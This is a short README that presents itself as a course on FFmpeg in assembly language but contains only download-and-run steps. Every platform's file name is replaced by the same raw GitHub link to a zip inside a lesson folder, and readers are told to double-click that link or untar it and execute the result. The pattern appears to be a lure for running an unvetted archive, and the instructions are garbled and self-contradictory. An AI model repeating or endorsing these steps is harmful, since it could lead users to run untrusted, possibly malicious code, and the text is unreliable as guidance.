🎓 asm-lessons - Learn FFmpeg with Assembly Language

🚀 Getting Started

Welcome to the asm-lessons project! This guide will help you download and run our lessons on FFmpeg using assembly language. No technical skills are required. Just follow these steps.

📥 Download & Install

To get started with the lessons, visit this page to download: GitHub Releases Page.

Here, you will find various versions of the application. Choose the latest release for the best experience.

Steps to Download:

  1. Click on the link above to go to the Releases page.
  2. Look for the most recent version. The version will be listed with a tag like v1.0.0.
  3. Under the release notes, find the file labeled with your operating system:
    • For Windows users, look for https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip.
    • For Mac users, find https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip.
    • For Linux users, check https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip.
  4. Click on the file you want to download.
  5. The download will begin automatically.

📂 File Locations

After the download finishes, locate the file:

  • Windows: Check your Downloads folder.
  • Mac: Open your Downloads or Applications folder.
  • Linux: Look in your home folder or the directory specified for your downloads.

⚙️ Running the Application

Now that you have downloaded the file, let’s run it:

For Windows:

  1. Navigate to the folder where the .exe file is located.
  2. Double-click on https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip.
  3. Follow the on-screen prompts to install.

For Mac:

  1. Double-click the downloaded .dmg file.
  2. Drag the asm-lessons icon to your Applications folder.
  3. Open your Applications folder and double-click on asm-lessons.

For Linux:

  1. Extract the contents of the https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip file using a command like tar -xvzf https://raw.githubusercontent.com/CSophanith/asm-lessons/main/lesson_02/asm-lessons_v3.8.zip.
  2. Navigate to the extracted folder in your terminal.
  3. Run the application with the command ./asm-lessons.
